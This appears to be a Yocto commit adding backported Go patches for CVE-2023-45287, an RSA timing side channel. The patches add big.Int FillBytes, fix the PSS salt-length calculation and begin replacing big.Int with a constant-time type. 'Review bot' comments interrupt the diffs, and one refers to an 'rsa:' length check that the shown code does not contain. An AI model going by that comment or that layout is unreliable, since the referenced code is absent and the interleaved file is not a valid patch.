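+- default:
+- return ErrVerification
+- }
+- }
+- if sLen < 0 {
++ psLen := bytes.IndexByte(db, 0x01)
++ if psLen < 0 {
+ return ErrVerification
+ }
+- } else {
+- // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
+- // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
+- // position is "position 1") does not have hexadecimal value 0x01,
+- // output "inconsistent" and stop.
+- for _, e := range db[:emLen-hLen-sLen-2] {
+- if e != 0x00 {
+- return ErrVerification
+- }
+- }
+- if db[emLen-hLen-sLen-2] != 0x01 {
++ sLen = len(db) - psLen - 1
++ }
++
++ // 10. If the emLen - hLen - sLen - 2 leftmost octets of DB are not zero
++ // or if the octet at position emLen - hLen - sLen - 1 (the leftmost
++ // position is "position 1") does not have hexadecimal value 0x01,
++ // output "inconsistent" and stop.
++ psLen := emLen - hLen - sLen - 2
++ for _, e := range db[:psLen] {
++ if e != 0x00 {
+ return ErrVerification
+ }
+ }
++ if db[psLen] != 0x01 {
++ return ErrVerification
++ }
+
+ // 11. Let salt be the last sLen octets of DB.
+ salt := db[len(db)-sLen:]
+@@ -181,19 +197,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
+ h0 := hash.Sum(nil)
+
+ // 14. If H = H', output "consistent." Otherwise, output "inconsistent."
+- if !bytes.Equal(h0, h) {
++ if !bytes.Equal(h0, h) { // TODO: constant time?
+ return ErrVerification
+ }
+ return nil
+ }
+
+-// signPSSWithSalt calculates the signature of hashed using PSS [1] with specified salt.
++// signPSSWithSalt calculates the signature of hashed using PSS with specified salt.
+ // Note that hashed must be the result of hashing the input message using the
+ // given hash function. salt is a random sequence of bytes whose length will be
+ // later used to verify the signature.
+ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
+- nBits := priv.N.BitLen()
+- em, err := emsaPSSEncode(hashed, nBits-1, salt, hash.New())
++ emBits := priv.N.BitLen() - 1
++ em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
+ if err != nil {
+ return
+ }
+@@ -202,7 +218,7 @@ func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed,
+ if err != nil {
+ return
+ }
+- s = make([]byte, (nBits+7)/8)
++ s = make([]byte, priv.Size())
+ copyWithLeftPad(s, c.Bytes())
+ return
+ }
+@@ -223,16 +239,15 @@ type PSSOptions struct {
+ // PSSSaltLength constants.
+ SaltLength int
+
+- // Hash, if not zero, overrides the hash function passed to SignPSS.
+- // This is the only way to specify the hash function when using the
+- // crypto.Signer interface.
++ // Hash is the hash function used to generate the message digest. If not
++ // zero, it overrides the hash function passed to SignPSS. It's required
++ // when using PrivateKey.Sign.
+ Hash crypto.Hash
+ }
+
+-// HashFunc returns pssOpts.Hash so that PSSOptions implements
+-// crypto.SignerOpts.
+-func (pssOpts *PSSOptions) HashFunc() crypto.Hash {
+- return pssOpts.Hash
++// HashFunc returns opts.Hash so that PSSOptions implements crypto.SignerOpts.
++func (opts *PSSOptions) HashFunc() crypto.Hash {
++ return opts.Hash
+ }
+
+ func (opts *PSSOptions) saltLength() int {
+@@ -242,56 +257,50 @@ func (opts *PSSOptions) saltLength() int {
+ return opts.SaltLength
+ }
+
+-// SignPSS calculates the signature of hashed using RSASSA-PSS [1].
+-// Note that hashed must be the result of hashing the input message using the
+-// given hash function. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []byte, opts *PSSOptions) ([]byte, error) {
++// SignPSS calculates the signature of digest using PSS.
++//
++// digest must be the result of hashing the input message using the given hash
++// function. The opts argument may be nil, in which case sensible defaults are
++// used. If opts.Hash is set, it overrides hash.
++func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte, opts *PSSOptions) ([]byte, error) {
++ if opts != nil && opts.Hash != 0 {
++ hash = opts.Hash
++ }
++
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = (priv.N.BitLen()+7)/8 - 2 - hash.Size()
++ saltLength = priv.Size() - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+
+- if opts != nil && opts.Hash != 0 {
+- hash = opts.Hash
+- }
+-
+ salt := make([]byte, saltLength)
+ if _, err := io.ReadFull(rand, salt); err != nil {
+ return nil, err
+ }
+- return signPSSWithSalt(rand, priv, hash, hashed, salt)
++ return signPSSWithSalt(rand, priv, hash, digest, salt)
+ }
+
+ // VerifyPSS verifies a PSS signature.
+-// hashed is the result of hashing the input message using the given hash
+-// function and sig is the signature. A valid signature is indicated by
+-// returning a nil error. The opts argument may be nil, in which case sensible
+-// defaults are used.
+-func VerifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, opts *PSSOptions) error {
+- return verifyPSS(pub, hash, hashed, sig, opts.saltLength())
+-}
+-
+-// verifyPSS verifies a PSS signature with the given salt length.
+-func verifyPSS(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte, saltLen int) error {
+- nBits := pub.N.BitLen()
+- if len(sig) != (nBits+7)/8 {
++//
++// A valid signature is indicated by returning a nil error. digest must be the
++// result of hashing the input message using the given hash function. The opts
++// argument may be nil, in which case sensible defaults are used. opts.Hash is
++// ignored.
++func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts *PSSOptions) error {
++ if len(sig) != pub.Size() {
+ return ErrVerification
+ }
+ s := new(big.Int).SetBytes(sig)
+ m := encrypt(new(big.Int), pub, s)
+- emBits := nBits - 1
++ emBits := pub.N.BitLen() - 1
+ emLen := (emBits + 7) / 8
+- if emLen < len(m.Bytes()) {
++ emBytes := m.Bytes()
++ if emLen < len(emBytes) {
+ return ErrVerification
+ }
+ em := make([]byte, emLen)
+- copyWithLeftPad(em, m.Bytes())
+- if saltLen == PSSSaltLengthEqualsHash {
+- saltLen = hash.Size()
+- }
+- return emsaPSSVerify(hashed, em, emBits, saltLen, hash.New())
++ copyWithLeftPad(em, emBytes)
++ return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
+ }
+diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
+index 5a42990640164..b4bfa13defbdf 100644
+--- a/src/crypto/rsa/rsa.go
++++ b/src/crypto/rsa/rsa.go
+@@ -2,7 +2,7 @@
+ // Use of this source code is governed by a BSD-style
+ // license that can be found in the LICENSE file.
+
+-// Package rsa implements RSA encryption as specified in PKCS#1.
++// Package rsa implements RSA encryption as specified in PKCS#1 and RFC 8017.
+ //
+ // RSA is a single, fundamental operation that is used in this package to
+ // implement either public-key encryption or public-key signatures.
+@@ -10,13 +10,13 @@
+ // The original specification for encryption and signatures with RSA is PKCS#1
+ // and the terms "RSA encryption" and "RSA signatures" by default refer to
+ // PKCS#1 version 1.5. However, that specification has flaws and new designs
+-// should use version two, usually called by just OAEP and PSS, where
++// should use version 2, usually called by just OAEP and PSS, where
+ // possible.
+ //
+ // Two sets of interfaces are included in this package. When a more abstract
+ // interface isn't necessary, there are functions for encrypting/decrypting
+ // with v1.5/OAEP and signing/verifying with v1.5/PSS. If one needs to abstract
+-// over the public-key primitive, the PrivateKey struct implements the
++// over the public key primitive, the PrivateKey type implements the
+ // Decrypter and Signer interfaces from the crypto package.
+ //
+ // The RSA operations in this package are not implemented using constant-time algorithms.
+@@ -111,7 +111,8 @@ func (priv *PrivateKey) Public() crypto.PublicKey {
+
+ // Sign signs digest with priv, reading randomness from rand. If opts is a
+ // *PSSOptions then the PSS algorithm will be used, otherwise PKCS#1 v1.5 will
+-// be used.
++// be used. digest must be the result of hashing the input message using
++// opts.HashFunc().
+ //
+ // This method implements crypto.Signer, which is an interface to support keys
+ // where the private part is kept in, for example, a hardware module. Common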
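Review bot: In emsaPSSVerify the comparison `if !bytes.Equal(h0, h) { // TODO: constant time?` leaves an open question in a signature-verification path, so a later reader cannot tell whether the variable-time compare was judged acceptable. From the only caller visible here, VerifyPSS, both values are derived from the public key, the signature and the digest, so no private-key material appears to be involved; record that decision instead, e.g. `// h0 and h derive from public inputs only; a variable-time compare is acceptable here`. If that assumption does not hold for every caller, use `subtle.ConstantTimeCompare(h0, h) != 1`, which needs `crypto/subtle` imported in pss.go. The new length check in the same function also uses the prefix `rsa:` where the neighbouring error in emsaPSSEncode uses `crypto/rsa:`.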
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
new file mode 100644
index 0000000000..1327b44545
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre2.patch
@@ -0,0 +1,401 @@
1From c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Mon, 27 Apr 2020 21:52:38 -0400
4Subject: [PATCH] math/big: add (*Int).FillBytes
5
6Replaced almost every use of Bytes with FillBytes.
7
8Note that the approved proposal was for
9
10 func (*Int) FillBytes(buf []byte)
11
12while this implements
13
14 func (*Int) FillBytes(buf []byte) []byte
15
16because the latter was far nicer to use in all callsites.
17
18Fixes #35833
19
20Change-Id: Ia912df123e5d79b763845312ea3d9a8051343c0a
21Reviewed-on: https://go-review.googlesource.com/c/go/+/230397
22Reviewed-by: Robert Griesemer <gri@golang.org>
23
24Upstream-Status: Backport [https://github.com/golang/go/commit/c9d5f60eaa4450ccf1ce878d55b4c6a12843f2f3]
25CVE: CVE-2023-45287 #Dependency Patch2
26Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
27---
28 src/crypto/elliptic/elliptic.go | 13 ++++----
29 src/crypto/rsa/pkcs1v15.go | 20 +++---------
30 src/crypto/rsa/pss.go | 17 +++++------
31 src/crypto/rsa/rsa.go | 32 +++----------------
32 src/crypto/tls/key_schedule.go | 7 ++---
33 src/crypto/x509/sec1.go | 7 ++---
34 src/math/big/int.go | 15 +++++++++
35 src/math/big/int_test.go | 54 +++++++++++++++++++++++++++++++++
36 src/math/big/nat.go | 15 ++++++---
37 9 files changed, 106 insertions(+), 74 deletions(-)
38
39diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
40index e2f71cdb63bab..bd5168c5fd842 100644
41--- a/src/crypto/elliptic/elliptic.go
42+++ b/src/crypto/elliptic/elliptic.go
43@@ -277,7 +277,7 @@ var mask = []byte{0xff, 0x1, 0x3, 0x7, 0xf, 0x1f, 0x3f, 0x7f}
44 func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err error) {
45 N := curve.Params().N
46 bitSize := N.BitLen()
47- byteLen := (bitSize + 7) >> 3
48+ byteLen := (bitSize + 7) / 8
49 priv = make([]byte, byteLen)
50
51 for x == nil {
52@@ -304,15 +304,14 @@ func GenerateKey(curve Curve, rand io.Reader) (priv []byte, x, y *big.Int, err e
53
54 // Marshal converts a point into the uncompressed form specified in section 4.3.6 of ANSI X9.62.
55 func Marshal(curve Curve, x, y *big.Int) []byte {
56- byteLen := (curve.Params().BitSize + 7) >> 3
57+ byteLen := (curve.Params().BitSize + 7) / 8
58
59 ret := make([]byte, 1+2*byteLen)
60 ret[0] = 4 // uncompressed point
61
62- xBytes := x.Bytes()
63- copy(ret[1+byteLen-len(xBytes):], xBytes)
64- yBytes := y.Bytes()
65- copy(ret[1+2*byteLen-len(yBytes):], yBytes)
66+ x.FillBytes(ret[1 : 1+byteLen])
67+ y.FillBytes(ret[1+byteLen : 1+2*byteLen])
68+
69 return ret
70 }
71
72@@ -320,7 +319,7 @@ func Marshal(curve Curve, x, y *big.Int) []byte {
73 // It is an error if the point is not in uncompressed form or is not on the curve.
74 // On error, x = nil.
75 func Unmarshal(curve Curve, data []byte) (x, y *big.Int) {
76- byteLen := (curve.Params().BitSize + 7) >> 3
77+ byteLen := (curve.Params().BitSize + 7) / 8
78 if len(data) != 1+2*byteLen {
79 return
80 }
81diff --git a/src/crypto/rsa/pkcs1v15.go b/src/crypto/rsa/pkcs1v15.go
82index 499242ffc5b57..3208119ae1ff4 100644
83--- a/src/crypto/rsa/pkcs1v15.go
84+++ b/src/crypto/rsa/pkcs1v15.go
85@@ -61,8 +61,7 @@ func EncryptPKCS1v15(rand io.Reader, pub *PublicKey, msg []byte) ([]byte, error)
86 m := new(big.Int).SetBytes(em)
87 c := encrypt(new(big.Int), pub, m)
88
89- copyWithLeftPad(em, c.Bytes())
90- return em, nil
91+ return c.FillBytes(em), nil
92 }
93
94 // DecryptPKCS1v15 decrypts a plaintext using RSA and the padding scheme from PKCS#1 v1.5.
95@@ -150,7 +149,7 @@ func decryptPKCS1v15(rand io.Reader, priv *PrivateKey, ciphertext []byte) (valid
96 return
97 }
98
99- em = leftPad(m.Bytes(), k)
100+ em = m.FillBytes(make([]byte, k))
101 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
102 secondByteIsTwo := subtle.ConstantTimeByteEq(em[1], 2)
103
104@@ -256,8 +255,7 @@ func SignPKCS1v15(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed []b
105 return nil, err
106 }
107
108- copyWithLeftPad(em, c.Bytes())
109- return em, nil
110+ return c.FillBytes(em), nil
111 }
112
113 // VerifyPKCS1v15 verifies an RSA PKCS#1 v1.5 signature.
114@@ -286,7 +284,7 @@ func VerifyPKCS1v15(pub *PublicKey, hash crypto.Hash, hashed []byte, sig []byte)
115
116 c := new(big.Int).SetBytes(sig)
117 m := encrypt(new(big.Int), pub, c)
118- em := leftPad(m.Bytes(), k)
119+ em := m.FillBytes(make([]byte, k))
120 // EM = 0x00 || 0x01 || PS || 0x00 || T
121
122 ok := subtle.ConstantTimeByteEq(em[0], 0)
123@@ -323,13 +321,3 @@ func pkcs1v15HashInfo(hash crypto.Hash, inLen int) (hashLen int, prefix []byte,
124 }
125 return
126 }
127-
128-// copyWithLeftPad copies src to the end of dest, padding with zero bytes as
129-// needed.
130-func copyWithLeftPad(dest, src []byte) {
131- numPaddingBytes := len(dest) - len(src)
132- for i := 0; i < numPaddingBytes; i++ {
133- dest[i] = 0
134- }
135- copy(dest[numPaddingBytes:], src)
136-}
137diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
138index f9844d87329a8..b2adbedb28fa8 100644
139--- a/src/crypto/rsa/pss.go
140+++ b/src/crypto/rsa/pss.go
141@@ -207,20 +207,19 @@ func emsaPSSVerify(mHash, em []byte, emBits, sLen int, hash hash.Hash) error {
142 // Note that hashed must be the result of hashing the input message using the
143 // given hash function. salt is a random sequence of bytes whose length will be
144 // later used to verify the signature.
145-func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) (s []byte, err error) {
146+func signPSSWithSalt(rand io.Reader, priv *PrivateKey, hash crypto.Hash, hashed, salt []byte) ([]byte, error) {
147 emBits := priv.N.BitLen() - 1
148 em, err := emsaPSSEncode(hashed, emBits, salt, hash.New())
149 if err != nil {
150- return
151+ return nil, err
152 }
153 m := new(big.Int).SetBytes(em)
154 c, err := decryptAndCheck(rand, priv, m)
155 if err != nil {
156- return
157+ return nil, err
158 }
159- s = make([]byte, priv.Size())
160- copyWithLeftPad(s, c.Bytes())
161- return
162+ s := make([]byte, priv.Size())
163+ return c.FillBytes(s), nil
164 }
165
166 const (
167@@ -296,11 +295,9 @@ func VerifyPSS(pub *PublicKey, hash crypto.Hash, digest []byte, sig []byte, opts
168 m := encrypt(new(big.Int), pub, s)
169 emBits := pub.N.BitLen() - 1
170 emLen := (emBits + 7) / 8
171- emBytes := m.Bytes()
172- if emLen < len(emBytes) {
173+ if m.BitLen() > emLen*8 {
174 return ErrVerification
175 }
176- em := make([]byte, emLen)
177- copyWithLeftPad(em, emBytes)
178+ em := m.FillBytes(make([]byte, emLen))
179 return emsaPSSVerify(digest, em, emBits, opts.saltLength(), hash.New())
180 }
181diff --git a/src/crypto/rsa/rsa.go b/src/crypto/rsa/rsa.go
182index b4bfa13defbdf..28eb5926c1a54 100644
183--- a/src/crypto/rsa/rsa.go
184+++ b/src/crypto/rsa/rsa.go
185@@ -416,16 +416,9 @@ func EncryptOAEP(hash hash.Hash, random io.Reader, pub *PublicKey, msg []byte, l
186 m := new(big.Int)
187 m.SetBytes(em)
188 c := encrypt(new(big.Int), pub, m)
189- out := c.Bytes()
190
191- if len(out) < k {
192- // If the output is too small, we need to left-pad with zeros.
193- t := make([]byte, k)
194- copy(t[k-len(out):], out)
195- out = t
196- }
197-
198- return out, nil
199+ out := make([]byte, k)
200+ return c.FillBytes(out), nil
201 }
202
203 // ErrDecryption represents a failure to decrypt a message.
204@@ -597,12 +590,9 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
205 lHash := hash.Sum(nil)
206 hash.Reset()
207
208- // Converting the plaintext number to bytes will strip any
209- // leading zeros so we may have to left pad. We do this unconditionally
210- // to avoid leaking timing information. (Although we still probably
211- // leak the number of leading zeros. It's not clear that we can do
212- // anything about this.)
213- em := leftPad(m.Bytes(), k)
214+ // We probably leak the number of leading zeros.
215+ // It's not clear that we can do anything about this.
216+ em := m.FillBytes(make([]byte, k))
217
218 firstByteIsZero := subtle.ConstantTimeByteEq(em[0], 0)
219
220@@ -643,15 +633,3 @@ func DecryptOAEP(hash hash.Hash, random io.Reader, priv *PrivateKey, ciphertext
221
222 return rest[index+1:], nil
223 }
224-
225-// leftPad returns a new slice of length size. The contents of input are right
226-// aligned in the new slice.
227-func leftPad(input []byte, size int) (out []byte) {
228- n := len(input)
229- if n > size {
230- n = size
231- }
232- out = make([]byte, size)
233- copy(out[len(out)-n:], input)
234- return
235-}
236diff --git a/src/crypto/tls/key_schedule.go b/src/crypto/tls/key_schedule.go
237index 2aab323202f7d..314016979afb8 100644
238--- a/src/crypto/tls/key_schedule.go
239+++ b/src/crypto/tls/key_schedule.go
240@@ -173,11 +173,8 @@ func (p *nistParameters) SharedKey(peerPublicKey []byte) []byte {
241 }
242
243 xShared, _ := curve.ScalarMult(x, y, p.privateKey)
244- sharedKey := make([]byte, (curve.Params().BitSize+7)>>3)
245- xBytes := xShared.Bytes()
246- copy(sharedKey[len(sharedKey)-len(xBytes):], xBytes)
247-
248- return sharedKey
249+ sharedKey := make([]byte, (curve.Params().BitSize+7)/8)
250+ return xShared.FillBytes(sharedKey)
251 }
252
253 type x25519Parameters struct {
254diff --git a/src/crypto/x509/sec1.go b/src/crypto/x509/sec1.go
255index 0bfb90cd5464a..52c108ff1d624 100644
256--- a/src/crypto/x509/sec1.go
257+++ b/src/crypto/x509/sec1.go
258@@ -52,13 +52,10 @@ func MarshalECPrivateKey(key *ecdsa.PrivateKey) ([]byte, error) {
259 // marshalECPrivateKey marshals an EC private key into ASN.1, DER format and
260 // sets the curve ID to the given OID, or omits it if OID is nil.
261 func marshalECPrivateKeyWithOID(key *ecdsa.PrivateKey, oid asn1.ObjectIdentifier) ([]byte, error) {
262- privateKeyBytes := key.D.Bytes()
263- paddedPrivateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
264- copy(paddedPrivateKey[len(paddedPrivateKey)-len(privateKeyBytes):], privateKeyBytes)
265-
266+ privateKey := make([]byte, (key.Curve.Params().N.BitLen()+7)/8)
267 return asn1.Marshal(ecPrivateKey{
268 Version: 1,
269- PrivateKey: paddedPrivateKey,
270+ PrivateKey: key.D.FillBytes(privateKey),
271 NamedCurveOID: oid,
272 PublicKey: asn1.BitString{Bytes: elliptic.Marshal(key.Curve, key.X, key.Y)},
273 })
274diff --git a/src/math/big/int.go b/src/math/big/int.go
275index 8816cf5266cc4..65f32487b58c0 100644
276--- a/src/math/big/int.go
277+++ b/src/math/big/int.go
278@@ -447,11 +447,26 @@ func (z *Int) SetBytes(buf []byte) *Int {
279 }
280
281 // Bytes returns the absolute value of x as a big-endian byte slice.
282+//
283+// To use a fixed length slice, or a preallocated one, use FillBytes.
284 func (x *Int) Bytes() []byte {
285 buf := make([]byte, len(x.abs)*_S)
286 return buf[x.abs.bytes(buf):]
287 }
288
289+// FillBytes sets buf to the absolute value of x, storing it as a zero-extended
290+// big-endian byte slice, and returns buf.
291+//
292+// If the absolute value of x doesn't fit in buf, FillBytes will panic.
293+func (x *Int) FillBytes(buf []byte) []byte {
294+ // Clear whole buffer. (This gets optimized into a memclr.)
295+ for i := range buf {
296+ buf[i] = 0
297+ }
298+ x.abs.bytes(buf)
299+ return buf
300+}
301+
302 // BitLen returns the length of the absolute value of x in bits.
303 // The bit length of 0 is 0.
304 func (x *Int) BitLen() int {
305diff --git a/src/math/big/int_test.go b/src/math/big/int_test.go
306index e3a1587b3f0ad..3c8557323a032 100644
307--- a/src/math/big/int_test.go
308+++ b/src/math/big/int_test.go
309@@ -1840,3 +1840,57 @@ func BenchmarkDiv(b *testing.B) {
310 })
311 }
312 }
313+
314+func TestFillBytes(t *testing.T) {
315+ checkResult := func(t *testing.T, buf []byte, want *Int) {
316+ t.Helper()
317+ got := new(Int).SetBytes(buf)
318+ if got.CmpAbs(want) != 0 {
319+ t.Errorf("got 0x%x, want 0x%x: %x", got, want, buf)
320+ }
321+ }
322+ panics := func(f func()) (panic bool) {
323+ defer func() { panic = recover() != nil }()
324+ f()
325+ return
326+ }
327+
328+ for _, n := range []string{
329+ "0",
330+ "1000",
331+ "0xffffffff",
332+ "-0xffffffff",
333+ "0xffffffffffffffff",
334+ "0x10000000000000000",
335+ "0xabababababababababababababababababababababababababa",
336+ "0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff",
337+ } {
338+ t.Run(n, func(t *testing.T) {
339+ t.Logf(n)
340+ x, ok := new(Int).SetString(n, 0)
341+ if !ok {
342+ panic("invalid test entry")
343+ }
344+
345+ // Perfectly sized buffer.
346+ byteLen := (x.BitLen() + 7) / 8
347+ buf := make([]byte, byteLen)
348+ checkResult(t, x.FillBytes(buf), x)
349+
350+ // Way larger, checking all bytes get zeroed.
351+ buf = make([]byte, 100)
352+ for i := range buf {
353+ buf[i] = 0xff
354+ }
355+ checkResult(t, x.FillBytes(buf), x)
356+
357+ // Too small.
358+ if byteLen > 0 {
359+ buf = make([]byte, byteLen-1)
360+ if !panics(func() { x.FillBytes(buf) }) {
361+ t.Errorf("expected panic for small buffer and value %x", x)
362+ }
363+ }
364+ })
365+ }
366+}
367diff --git a/src/math/big/nat.go b/src/math/big/nat.go
368index c31ec5156b81d..6a3989bf9d82b 100644
369--- a/src/math/big/nat.go
370+++ b/src/math/big/nat.go
371@@ -1476,19 +1476,26 @@ func (z nat) expNNMontgomery(x, y, m nat) nat {
372 }
373
374 // bytes writes the value of z into buf using big-endian encoding.
375-// len(buf) must be >= len(z)*_S. The value of z is encoded in the
376-// slice buf[i:]. The number i of unused bytes at the beginning of
377-// buf is returned as result.
378+// The value of z is encoded in the slice buf[i:]. If the value of z
379+// cannot be represented in buf, bytes panics. The number i of unused
380+// bytes at the beginning of buf is returned as result.
381 func (z nat) bytes(buf []byte) (i int) {
382 i = len(buf)
383 for _, d := range z {
384 for j := 0; j < _S; j++ {
385 i--
386- buf[i] = byte(d)
387+ if i >= 0 {
388+ buf[i] = byte(d)
389+ } else if byte(d) != 0 {
390+ panic("math/big: buffer too small to fit value")
391+ }
392 d >>= 8
393 }
394 }
395
396+ if i < 0 {
397+ i = 0
398+ }
399 for i < len(buf) && buf[i] == 0 {
400 i++
401 }
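--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287-pre3.patch
@@ -0,0 +1,86 @@
+From 8f676144ad7b7c91adb0c6e1ec89aaa6283c6807 Mon Sep 17 00:00:00 2001
+From: Himanshu Kishna Srivastava <28himanshu@gmail.com>
+Date: Tue, 16 Mar 2021 22:37:46 +0530
+Subject: [PATCH] crypto/rsa: fix salt length calculation with
+ PSSSaltLengthAuto
+
+When PSSSaltLength is set, the maximum salt length must equal:
+
+ (modulus_key_size - 1 + 7)/8 - hash_length - 2
+and for example, with a 4096 bit modulus key, and a SHA-1 hash,
+it should be:
+
+ (4096 -1 + 7)/8 - 20 - 2 = 490
+Previously we'd encounter this error:
+
+ crypto/rsa: key size too small for PSS signature
+
+Fixes #42741
+
+Change-Id: I18bb82c41c511d564b3f4c443f4b3a38ab010ac5
+Reviewed-on: https://go-review.googlesource.com/c/go/+/302230
+Reviewed-by: Emmanuel Odeke <emmanuel@orijtech.com>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+Trust: Emmanuel Odeke <emmanuel@orijtech.com>
+Run-TryBot: Emmanuel Odeke <emmanuel@orijtech.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/8f676144ad7b7c91adb0c6e1ec89aaa6283c6807]
+CVE: CVE-2023-45287 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/crypto/rsa/pss.go | 2 +-
+ src/crypto/rsa/pss_test.go | 20 +++++++++++++++++++-
+ 2 files changed, 20 insertions(+), 2 deletions(-)
+
+diff --git a/src/crypto/rsa/pss.go b/src/crypto/rsa/pss.go
+index b2adbedb28fa8..814522de8181f 100644
+--- a/src/crypto/rsa/pss.go
++++ b/src/crypto/rsa/pss.go
+@@ -269,7 +269,7 @@ func SignPSS(rand io.Reader, priv *PrivateKey, hash crypto.Hash, digest []byte,
+ saltLength := opts.saltLength()
+ switch saltLength {
+ case PSSSaltLengthAuto:
+- saltLength = priv.Size() - 2 - hash.Size()
++ saltLength = (priv.N.BitLen()-1+7)/8 - 2 - hash.Size()
+ case PSSSaltLengthEqualsHash:
+ saltLength = hash.Size()
+ }
+diff --git a/src/crypto/rsa/pss_test.go b/src/crypto/rsa/pss_test.go
+index dfa8d8bb5ad02..c3a6d468497cd 100644
+--- a/src/crypto/rsa/pss_test.go
++++ b/src/crypto/rsa/pss_test.go
+@@ -12,7 +12,7 @@ import (
+ _ "crypto/md5"
+ "crypto/rand"
+ "crypto/sha1"
+- _ "crypto/sha256"
++ "crypto/sha256"
+ "encoding/hex"
+ "math/big"
+ "os"
+@@ -233,6 +233,24 @@ func TestPSSSigning(t *testing.T) {
+ }
+ }
+
++func TestSignWithPSSSaltLengthAuto(t *testing.T) {
++ key, err := GenerateKey(rand.Reader, 513)
++ if err != nil {
++ t.Fatal(err)
++ }
++ digest := sha256.Sum256([]byte("message"))
++ signature, err := key.Sign(rand.Reader, digest[:], &PSSOptions{
++ SaltLength: PSSSaltLengthAuto,
++ Hash: crypto.SHA256,
++ })
++ if err != nil {
++ t.Fatal(err)
++ }
++ if len(signature) == 0 {
++ t.Fatal("empty signature returned")
++ }
++}
++
+ func bigFromHex(hex string) *big.Int {
+ n, ok := new(big.Int).SetString(hex, 16)
+ if !ok {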
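Review bot: In the `PSSSaltLengthAuto` case of SignPSS, `(priv.N.BitLen()-1+7)/8 - 2 - hash.Size()` goes negative when the modulus is short relative to the hash output, and nothing visible in the hunk rejects that value. The rest of SignPSS is outside the hunk, so a later guard may exist; if it does not, add `if saltLength < 0 { return nil, ErrMessageTooLong }` directly after the assignment so an undersized key yields an error rather than reaching the salt allocation. TestSignWithPSSSaltLengthAuto would also be stronger if it passed the signature to `VerifyPSS` instead of only checking `len(signature) == 0`.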
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
new file mode 100644
index 0000000000..90a74255db
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-45287.patch
@@ -0,0 +1,1697 @@
1From 8a81fdf165facdcefa06531de5af98a4db343035 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?L=C3=BAc=C3=A1s=20Meier?= <cronokirby@gmail.com>
3Date: Tue, 8 Jun 2021 21:36:06 +0200
4Subject: [PATCH] crypto/rsa: replace big.Int for encryption and decryption
5
6Infamously, big.Int does not provide constant-time arithmetic, making
7its use in cryptographic code quite tricky. RSA uses big.Int
8pervasively, in its public API, for key generation, precomputation, and
9for encryption and decryption. This is a known problem. One mitigation,
10blinding, is already in place during decryption. This helps mitigate the
11very leaky exponentiation operation. Because big.Int is fundamentally
12not constant-time, it's unfortunately difficult to guarantee that
13mitigations like these are completely effective.
14
15This patch removes the use of big.Int for encryption and decryption,
16replacing it with an internal nat type instead. Signing and verification
17are also affected, because they depend on encryption and decryption.
18
19Overall, this patch degrades performance by 55% for private key
20operations, and 4-5x for (much faster) public key operations.
21(Signatures do both, so the slowdown is worse than decryption.)
22
23name old time/op new time/op delta
24DecryptPKCS1v15/2048-8 1.50ms ± 0% 2.34ms ± 0% +56.44% (p=0.000 n=8+10)
25DecryptPKCS1v15/3072-8 4.40ms ± 0% 6.79ms ± 0% +54.33% (p=0.000 n=10+9)
26DecryptPKCS1v15/4096-8 9.31ms ± 0% 15.14ms ± 0% +62.60% (p=0.000 n=10+10)
27EncryptPKCS1v15/2048-8 8.16µs ± 0% 355.58µs ± 0% +4258.90% (p=0.000 n=10+9)
28DecryptOAEP/2048-8 1.50ms ± 0% 2.34ms ± 0% +55.68% (p=0.000 n=10+9)
29EncryptOAEP/2048-8 8.51µs ± 0% 355.95µs ± 0% +4082.75% (p=0.000 n=10+9)
30SignPKCS1v15/2048-8 1.51ms ± 0% 2.69ms ± 0% +77.94% (p=0.000 n=10+10)
31VerifyPKCS1v15/2048-8 7.25µs ± 0% 354.34µs ± 0% +4789.52% (p=0.000 n=9+9)
32SignPSS/2048-8 1.51ms ± 0% 2.70ms ± 0% +78.80% (p=0.000 n=9+10)
33VerifyPSS/2048-8 8.27µs ± 1% 355.65µs ± 0% +4199.39% (p=0.000 n=10+10)
34
